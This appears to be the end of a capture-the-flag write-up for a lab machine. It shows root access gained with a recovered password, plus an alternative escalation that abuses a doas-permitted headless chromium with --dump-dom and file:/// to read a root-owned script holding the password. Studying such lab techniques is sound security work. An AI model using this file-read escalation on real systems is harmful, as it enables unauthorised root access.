Guess that the root password is UGhhbnRvbSBFbmdhZ2UK.

softly@pepster:/tmp$ su root
Password:
root@pepster:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@pepster:/tmp# cd ~
root@pepster:~# cat root.txt
flag{e96f7a29ba633b4e43214b43d1791074}

Here is another approach, from Ta0: chromium has a --dump-dom flag that prints the full HTML DOM in headless mode.

And, as everyone knows, a browser can read local files through file:///.

So simply adding --dump-dom dumps the script that sends the POST data, which hands us the root password.

softly@Chromee:~$ doas /usr/bin/chromium --headless --dump-dom --disable-gpu --no-sandbox "file:///root/script.js"
[0401/095504.711549:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">const CDP = require('chrome-remote-interface');

async function sendPostRequest() {
const client = await CDP();

const { Network, Page, Runtime } = client;

try {
// enable network debugging
await Network.enable();

// enable page debugging
await Page.enable();

// open the page
await Page.navigate({ url: 'http://127.0.0.1:80' });
await Page.loadEventFired(); // wait for the page to finish loading

console.log('Page loaded. Sending POST request...');

// run fetch inside the browser context to send the POST request
const postData = JSON.stringify({ key: 'UGhhbnRvbSBFbmdhZ2UK' });

const script = `
fetch('http://127.0.0.1/post.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '${postData}'
}).then(res =&gt; res.text()).then(console.log).catch(console.error);
`;

// execute the JavaScript in the browser via Runtime.evaluate
await Runtime.evaluate({ expression: script });

} catch (err) {
console.error('Error:', err);
} finally {
client.close();
}
}

sendPostRequest();

</pre></body></html>